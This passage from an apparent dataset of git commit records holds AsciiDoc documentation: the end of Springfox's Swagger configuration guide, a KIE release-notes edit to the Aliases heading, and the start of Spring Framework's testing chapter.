to echo the expression as-is.\n\n[source,properties]\n.application.properties\n----\nSomeController.findPetsByStatus.notes=Finds pets by status\nSomeController.findPetsByStatus.status=Status could be one of ...\nSomeController.operation2.header1=Header for bla bla...\nSomeController.operation2.value=Operation 2 do something...\nSomeModel.someProperty=Some property description\n----\n\n==== Swagger group\n\nA swagger group is a concept introduced by this library which is simply a unique identifier for a Swagger Resource Listing\nwithin your application. The reason this concept was introduced was to support applications which require more than one\nResource Listing. Why would you need more than one Resource Listing?\n- A single Spring Web MVC application serves more than one API e.g. publicly facing and internally facing.\n- A single Spring Web MVC application serves multiple versions of the same API. e.g. v1 and v2\n\nIn most cases an application will not need more than one Resource Listing and the concept of swagger groups can be ignored.\n\n==== Configuring the output of _operationId_ in a Swagger 2.0 spec\n\nAs defined https:\/\/github.com\/swagger-api\/swagger-spec\/blob\/master\/versions\/2.0.md#fixed-fields-5[`operationId` was\nintroduced] in the Swagger 2.0 spec, the `operationId` parameter, which was referred to as `nickname` in pre-2.0\nversions of the Swagger spec, provides the author a means by which to describe an API operation with a friendly name\n. This field is often used by consumers of a Swagger 2.0 spec in order to name functions in generated clients. An\nexample of this can be seen in the https:\/\/github.com\/swagger-api\/swagger-codegen[swagger-codegen project].\n\n===== The default value of `operationId` according to Springfox\n\nBy default, when using Springfox in Swagger 2.0 mode, the value of `operationID` will be rendered using the\nfollowing structure: \"`[java_method_name_here]Using[HTTP_verb_here]`\". For example, if one has a method `getPets()`\nconnected to an HTTP GET verb, Springfox will render `getPetsUsingGET` for the operationId.\n\n====== Given this annotated method ...\n\n```java\n@ApiOperation(value = \"\")\n@RequestMapping(value = \"\/pets\", method = RequestMethod.GET)\npublic Model getAllThePets() {\n ...\n}\n```\n\n====== the default `operationId` will render looking like this:\n\n```json\n\n\"paths\": {\n \"\/pets\": {\n \"get\": {\n ...\n \"operationId\":\"getAllThePetsUsingGET\"\n ...\n }\n }\n}\n\n```\n\n===== Customizing the value of _operationId_\n\nIn the event you wish to override the default `operationId` which Springfox renders, you may do so by providing the\n`nickname` element in an `@ApiOperation` annotation.\n\n====== Given this annotated method ...\n\n```java\n@ApiOperation(value = \"\", nickname = \"getMeAllThePetsPlease\")\n@RequestMapping(value = \"\/pets\", method = RequestMethod.GET)\npublic Model getAllThePets() {\n ...\n}\n```\n\n====== ... the customized *operationId* will render looking like this:\n\n```json\n\n\"paths\": {\n \"\/pets\": {\n \"get\": {\n ...\n \"operationId\":\"getMeAllThePetsPlease\"\n ...\n }\n }\n}\n\n```\n\n==== Changing how Generic Types are Named\n\nBy default, types with generics will be labeled with '\\u00ab'(<<), '\\u00bb'(>>), and commas. This can be problematic\nwith things like swagger-codegen. You can override this behavior by implementing your own `GenericTypeNamingStrategy`.\nFor example, if you wanted `List<String>` to be encoded as 'ListOfString' and `Map<String, Object>`\nto be encoded as 'MapOfStringAndObject' you could set the `forCodeGeneration` customization option to `true` during\nplugin customization:\n\n```java\n docket.forCodeGeneration(true|false);\n```\n\n=== Caching\n\nThe caching feature that was introduced in 2.1.0 has been removed. Springfox no longer uses the cache abstraction to\nimprove performance the api scanners and readers. It has been rolled into the library as an internal implementation\ndetail as of 2.1.2. This is a runtime breaking change, however, since its not really breaking api compatibility change\nother than the introduction of configuration change in consuming applications, we're not incrementing the minor version.\n\n=== Configuring Security Schemes and Contexts an Overview\n\nThe security provisions in SpringFox at a high level, without getting into the code, has different pieces\nthat all work together in concert\n\n- The API itself needs to be protected. This is achieved by using, for simplicity sake, spring security and may also\nuse a combination of servlet container and tomcat\/jersey etc.\n- The security scheme which describes the techniques you've used to protect the api. Spring fox supports whatever\nschemes swagger specification supports (ApiKey, BasicAuth and OAuth2 (certain profiles))\n- Finally the security contexts which actually provides information on which api's are protected by which schemes. I\nthink in your example, you're missing the last piece of the puzzle, the security context see xref:getting-started-spring-boot[15].\n\n=== Example application\n\nFor an examples for spring-boot, vanilla spring applications take a look https:\/\/github.com\/springfox\/springfox-demos[examples]\nin the demo application.\n\n== Configuring springfox-staticdocs\n\nIMPORTANT: Support for this module has been deprecated in 2.7.0. Since swagger2markup doesnt support jdk6 anymore it is\ndifficult for build to co-exist with the newer version of swagger2markup. Please use the\n_latest_ instructions provided in the awesome https:\/\/github.com\/Swagger2Markup\/swagger2markup[Swagger2Markup Library].\n\n== Security\n\nThanks to https:\/\/github.com\/mojaiq[Javed Mohammed] we now have an example https:\/\/github.com\/springfox\/springfox-oath2-demo[oauth demo].\n\nNOTE: this is based on swagger-ui pre 3.x\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d97d551d7ed2b2e9fcdfb806b51cd79a091632d","subject":"BXMSDOC-1910 updated Aliases formatting","message":"BXMSDOC-1910 updated Aliases formatting\n","repos":"manstis\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs","old_file":"docs\/product-release-notes\/src\/main\/asciidoc\/con-bxms-rn-whats-new.adoc","new_file":"docs\/product-release-notes\/src\/main\/asciidoc\/con-bxms-rn-whats-new.adoc","new_contents":"\n[[bxms_rn_whats_new]]\n= What's New\n\nThis section highlights new features in {PRODUCT} {PRODUCT_VERSION} Limited Availability.\n\n== Business Central\n \n=== Improved Navigation\n\n.Navigation between views\nYou can now navigate as follows:\n\n* From a process instance to the associated jobs\n* From a job to the associated process instance\n* From a process instance to the associated tasks\n\n.Business Central Home page\nThe Business Central Home page has been redesigned for easier navigation. For more information, see the \"Business Central\" chapter of the _{PRODUCT} User Guide_.\n\n=== Guided Decision Table\n* Guided Decision Table has a new wizard for creating and editing columns.\n* Hit policies are now available. Hit policies determine the order in which rules (rows) in a guided decision table are applied.\n* New support to display multiple linked guided decision tables in the Guided Decision Table Editor has been added.\n\n=== Projects Metrics dashboard\nA new dashboard is now available for every project listed in the Projects perspective. The Projects Metrics dashboard shows all of your project contribution metrics in one place. This new dashboard replaces the Contributors page, which was part of the Authoring group. For more information, see the \"Projects Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== Team Metrics dashboard\nThe Team Metrics dashboard shows all project metrics by team in a single page. This new dashboard replaces the older Contributors page, which was part of the Authoring group. For more information, see the \"Team Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== New columns available on process instances, tasks, and jobs\nThe following columns have been added to the corresponding perspectives:\n\n* Process instance list perspective: Last update and correlation key.\n* Task list: Last update, correlation key (of the associated process instance ID), process instance description (of the associated process instance).\n* Jobs perspective: Name of the associated process (if any), ID of the associated process instance (if any), Description of the associated process instance (if any).\n\n=== Advanced search filter\nYou can now search for specific data by using the *Search* tab on the Jobs, Process Instances, Tasks Administration, and Execution Errors perspectives. For information about the new search feature, see the \"Using the advanced search filter pages\" section of the _{PRODUCT} {RELEASE} User Guide_.\n\n=== New Task List and Task Administration perspectives\nThe former Task List perspective has been divided into the Tasks List and Task Administration perspectives. The Task List perspective is used by task operators to work with their assigned (or potentially assigned) tasks. The Task Administration perspective is used by administrators to manage tasks assigned to other users. This perspective is only available for users with admin or process-admin roles. It is similar to the Admin filter tab on the former Task List perspective.\n\n=== Improved validation in deployment descriptor editor\n\nThe deployment descriptor editor in Business Central has been improved to validate data entered for the following:\n\n* Work item handlers\n* Event listeners\n* Marshalling strategies\n* Globals\n* Environment entries\n* Configuration\n\nValidation is performed automatically when a build is invoked or manually when a user clicks *Validate*.\n\n=== Error Handling\nThe system now detects and stores execution errors such as exceptions while running a process instance or a job after the maximum number of retries has been exceeded. If an error occurs, an event is generated that contains the following data:\n\n--\n[cols=\"1,2\",options=\"header\"]\n|===\n| Data\n| Fields\n\n.3+| Process model\n| processModelID\n| processModelVersion\n| processModelName\n\n.2+| Process instance that has failed\n| processInstanceID\n| customProcessID\n\n.5+| Activity that has failed\n| activityID\n| activityName\n| activityType\n| iteration\n| status\n\n.2+| Error data\n| errorMessage: Message with the error that has occurred.\n| errorStack: Stack with error detail.\n|===\n--\n\nThe process instance list includes a new column that displays the number of errors per process instance which are not marked as acknowledged. When you select the column, a window appears which will enables you to navigate to the new Error perspective.\n\nThe Execution Errors perspective lists any errors that occur during process instances or executor service jobs on a Decision Server. Use this perspective to help troubleshoot issues. It is visible to users with the admin and process-admin roles.\n\n\n== Process Engine\n\n=== Process and task administration API\nA process administration API and task administration API have been introduced to simplify some of the more complex administrator use cases.\nThe process admin API enables you to:\n\n* Retrieve all process definition nodes\n* Cancel node instances\n* Retrigger node instances\n* Update the timer (absolute or relative)\n* List timer instances\n* Trigger nodes\n\nThe task administration API enables you to:\n\n* Add and remove potential owners and excluded owners and business administrators\n* Add and remove task inputs and outputs\n* List, create, and cancel escalations and notifications\n\n=== Advanced task routing\nWhen tasks are assigned to a group of users, you can use pluggable task assignment strategies to automatically assign tasks to a suitable individual immediately. This enables more efficient task allocation, based on all properties associated with the task (for example potential owners and task priority but also task data that includes information such as geography, required skills, and so forth). You can use business rules to define the assignment logic, making it easy to customize this to your needs.\n\n=== Process execution server\nThe process execution server (also known as kie-server) has been extended to support core engine features and offers a remote API for these operations. In addition the following architectural changes were introduced.\n\n==== Separate Business Central from execution server\nBusiness Central now delegates all of its requests to the execution server as well. The main advantage is that Business Central can now be used to monitor any set of execution servers. By linking the execution server to Business Central, the process and task monitoring UIs in Business Central can now connect to this execution server and show all relevant information. When multiple independent execution servers are used, you can either connect to a specific one or use the smart router to aggregate information across multiple servers. \n\n==== Smart router\nThe smart router (also known as kie-server-router) can be used as a proxy to help manage multiple independent process execution servers.\n\n==== Aliases\nYou can now use aliases instead of container IDs in the remote REST APIs of the execution server. For more information, see the \"Editing container aliases through Business Central\" section of the _{PRODUCT} User Guide_.\n \n=== Business Central Monitoring web application\nA new distribution `war` file that enables you to build custom cloud images has been added in this release.The Business Central Monitoring web application should be used with Decision Server instances to manage all run time capabilities in the cloud. This includes managing containers, process instances, tasks, and dashboards. Unlike the standard Business Central distribution, no authoring capabilities are offered.\n\nNOTE:\nFor on premise deployments, use the standard Business Central `war` file.\n \n=== Work Item archetype\n\nTo help users build custom service tasks (work items), {PRODUCT} comes with the Work Item archetype that generates the majority of items required to build a custom service task. It does include:\n\n* A Work Item Definition (WID) file\n* The Work Item Handler implementation class\n* The Work Item Handler test class\n\nThe Maven assembly (zip) packages everything at build time so it can be consumed by the Service Repository and therefore be used from within the Web Designer.\n\n=== KIE Server Maven plugins\nKIE Server has been enhanced with additional Maven plugins that enable interaction with the KIE Server and KIE Controller REST API directly from within a build. This facilitates easier integration with CI\/CD pipelines when building KJars so they can be directly deployed to the execution environment (both managed and unmanaged KIE Servers).\n\n== Business Resource Planner\n* Multi-threaded partitioned search is available. Business Resource Planner now has out-of-the box support for solving a single data set by partitioning across multiple threads. This enhancement makes use of multiple CPU cores for a single problem. Partitioned search can implement geo-fencing for Vehicle Routing use cases. \n* The Solution interface is deprecated. Your solution class requires only the `@PlanningSolution` annotation.\n* You no longer need to define the score type in the solver configuration. Business Resource Planner now picks it up automatically from the domain model.\n* The Business Resource Planner Solver editor screen now supports adding all termination types, including composite termination. The phase configuration section enables you to tweak Construction Heuristic settings and select Local Search algorithm to optimize your planning problem.\n* Examples are now part of Business Central and they work offline as well. Leverage tag-based filtering to quickly access projects from the field you are interested in.\n* The Business Resource Planner domain editor can now specify a planning entity difficulty. Navigate through the object hierarchy and define the sorting attributes. Several construction heuristic algorithms use this information to construct a better initial solution.\n* The Business Resource Planner execution server now supports real-time planning.\n\n\n","old_contents":"\n[[bxms_rn_whats_new]]\n= What's New\n\nThis section highlights new features in {PRODUCT} {PRODUCT_VERSION} Limited Availability.\n\n== Business Central\n \n=== Improved Navigation\n\n.Navigation between views\nYou can now navigate as follows:\n\n* From a process instance to the associated jobs\n* From a job to the associated process instance\n* From a process instance to the associated tasks\n\n.Business Central Home page\nThe Business Central Home page has been redesigned for easier navigation. For more information, see the \"Business Central\" chapter of the _{PRODUCT} User Guide_.\n\n=== Guided Decision Table\n* Guided Decision Table has a new wizard for creating and editing columns.\n* Hit policies are now available. Hit policies determine the order in which rules (rows) in a guided decision table are applied.\n* New support to display multiple linked guided decision tables in the Guided Decision Table Editor has been added.\n\n=== Projects Metrics dashboard\nA new dashboard is now available for every project listed in the Projects perspective. The Projects Metrics dashboard shows all of your project contribution metrics in one place. This new dashboard replaces the Contributors page, which was part of the Authoring group. For more information, see the \"Projects Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== Team Metrics dashboard\nThe Team Metrics dashboard shows all project metrics by team in a single page. This new dashboard replaces the older Contributors page, which was part of the Authoring group. For more information, see the \"Team Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== New columns available on process instances, tasks, and jobs\nThe following columns have been added to the corresponding perspectives:\n\n* Process instance list perspective: Last update and correlation key.\n* Task list: Last update, correlation key (of the associated process instance ID), process instance description (of the associated process instance).\n* Jobs perspective: Name of the associated process (if any), ID of the associated process instance (if any), Description of the associated process instance (if any).\n\n=== Advanced search filter\nYou can now search for specific data by using the *Search* tab on the Jobs, Process Instances, Tasks Administration, and Execution Errors perspectives. For information about the new search feature, see the \"Using the advanced search filter pages\" section of the _{PRODUCT} {RELEASE} User Guide_.\n\n=== New Task List and Task Administration perspectives\nThe former Task List perspective has been divided into the Tasks List and Task Administration perspectives. The Task List perspective is used by task operators to work with their assigned (or potentially assigned) tasks. The Task Administration perspective is used by administrators to manage tasks assigned to other users. This perspective is only available for users with admin or process-admin roles. It is similar to the Admin filter tab on the former Task List perspective.\n\n=== Improved validation in deployment descriptor editor\n\nThe deployment descriptor editor in Business Central has been improved to validate data entered for the following:\n\n* Work item handlers\n* Event listeners\n* Marshalling strategies\n* Globals\n* Environment entries\n* Configuration\n\nValidation is performed automatically when a build is invoked or manually when a user clicks *Validate*.\n\n=== Error Handling\nThe system now detects and stores execution errors such as exceptions while running a process instance or a job after the maximum number of retries has been exceeded. If an error occurs, an event is generated that contains the following data:\n\n--\n[cols=\"1,2\",options=\"header\"]\n|===\n| Data\n| Fields\n\n.3+| Process model\n| processModelID\n| processModelVersion\n| processModelName\n\n.2+| Process instance that has failed\n| processInstanceID\n| customProcessID\n\n.5+| Activity that has failed\n| activityID\n| activityName\n| activityType\n| iteration\n| status\n\n.2+| Error data\n| errorMessage: Message with the error that has occurred.\n| errorStack: Stack with error detail.\n|===\n--\n\nThe process instance list includes a new column that displays the number of errors per process instance which are not marked as acknowledged. When you select the column, a window appears which will enables you to navigate to the new Error perspective.\n\nThe Execution Errors perspective lists any errors that occur during process instances or executor service jobs on a Decision Server. Use this perspective to help troubleshoot issues. It is visible to users with the admin and process-admin roles.\n\n\n== Process Engine\n\n=== Process and task administration API\nA process administration API and task administration API have been introduced to simplify some of the more complex administrator use cases.\nThe process admin API enables you to:\n\n* Retrieve all process definition nodes\n* Cancel node instances\n* Retrigger node instances\n* Update the timer (absolute or relative)\n* List timer instances\n* Trigger nodes\n\nThe task administration API enables you to:\n\n* Add and remove potential owners and excluded owners and business administrators\n* Add and remove task inputs and outputs\n* List, create, and cancel escalations and notifications\n\n=== Advanced task routing\nWhen tasks are assigned to a group of users, you can use pluggable task assignment strategies to automatically assign tasks to a suitable individual immediately. This enables more efficient task allocation, based on all properties associated with the task (for example potential owners and task priority but also task data that includes information such as geography, required skills, and so forth). You can use business rules to define the assignment logic, making it easy to customize this to your needs.\n\n=== Process execution server\nThe process execution server (also known as kie-server) has been extended to support core engine features and offers a remote API for these operations. In addition the following architectural changes were introduced.\n\n==== Separate Business Central from execution server\nBusiness Central now delegates all of its requests to the execution server as well. The main advantage is that Business Central can now be used to monitor any set of execution servers. By linking the execution server to Business Central, the process and task monitoring UIs in Business Central can now connect to this execution server and show all relevant information. When multiple independent execution servers are used, you can either connect to a specific one or use the smart router to aggregate information across multiple servers. \n\n==== Smart router\nThe smart router (also known as kie-server-router) can be used as a proxy to help manage multiple independent process execution servers.\n\n=== Aliases\nYou can now use aliases instead of container IDs in the remote REST APIs of the execution server. For more information, see the \"Editing container aliases through Business Central\" section of the _{PRODUCT} User Guide_.\n \n=== Business Central Monitoring web application\nA new distribution `war` file that enables you to build custom cloud images has been added in this release.The Business Central Monitoring web application should be used with Decision Server instances to manage all run time capabilities in the cloud. This includes managing containers, process instances, tasks, and dashboards. Unlike the standard Business Central distribution, no authoring capabilities are offered.\n\nNOTE:\nFor on premise deployments, use the standard Business Central `war` file.\n \n=== Work Item archetype\n\nTo help users build custom service tasks (work items), {PRODUCT} comes with the Work Item archetype that generates the majority of items required to build a custom service task. It does include:\n\n* A Work Item Definition (WID) file\n* The Work Item Handler implementation class\n* The Work Item Handler test class\n\nThe Maven assembly (zip) packages everything at build time so it can be consumed by the Service Repository and therefore be used from within the Web Designer.\n\n=== KIE Server Maven plugins\nKIE Server has been enhanced with additional Maven plugins that enable interaction with the KIE Server and KIE Controller REST API directly from within a build. This facilitates easier integration with CI\/CD pipelines when building KJars so they can be directly deployed to the execution environment (both managed and unmanaged KIE Servers).\n\n== Business Resource Planner\n* Multi-threaded partitioned search is available. Business Resource Planner now has out-of-the box support for solving a single data set by partitioning across multiple threads. This enhancement makes use of multiple CPU cores for a single problem. Partitioned search can implement geo-fencing for Vehicle Routing use cases. \n* The Solution interface is deprecated. Your solution class requires only the `@PlanningSolution` annotation.\n* You no longer need to define the score type in the solver configuration. Business Resource Planner now picks it up automatically from the domain model.\n* The Business Resource Planner Solver editor screen now supports adding all termination types, including composite termination. The phase configuration section enables you to tweak Construction Heuristic settings and select Local Search algorithm to optimize your planning problem.\n* Examples are now part of Business Central and they work offline as well. Leverage tag-based filtering to quickly access projects from the field you are interested in.\n* The Business Resource Planner domain editor can now specify a planning entity difficulty. Navigate through the object hierarchy and define the sorting attributes. Several construction heuristic algorithms use this information to construct a better initial solution.\n* The Business Resource Planner execution server now supports real-time planning.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b6f99e38ae35a25034df0eb3e7750b1036ea8ddd","subject":"Polish wording regarding previous release versions in reference manual","message":"Polish wording regarding previous release versions in reference manual\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/testing.adoc","new_file":"src\/asciidoc\/testing.adoc","new_contents":"[[testing]]\n= Testing\n\n[partintro]\n--\nThe adoption of the test-driven-development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so coverage of Spring's\nsupport for integration testing is covered (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and suchlike)... the chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n--\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see <<beans-definition-profiles>>\nand <<beans-property-source-abstraction>>). `MockEnvironment` and\n`MockPropertySource` are useful for developing __out-of-container__ tests for code that\ndepends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ++DataSource++s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. Since\nSpring Framework 4.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 3.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ++Controller++s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n[[mock-objects-portlet]]\n==== Portlet API\nThe `org.springframework.mock.web.portlet` package contains a set of Portlet API mock\nobjects, targeted at usage with Spring's Portlet MVC framework.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ++Controller++s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ++Controller++s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n++ApplicationContext++s and ++WebApplicationContext++s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ++DataSource++s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in 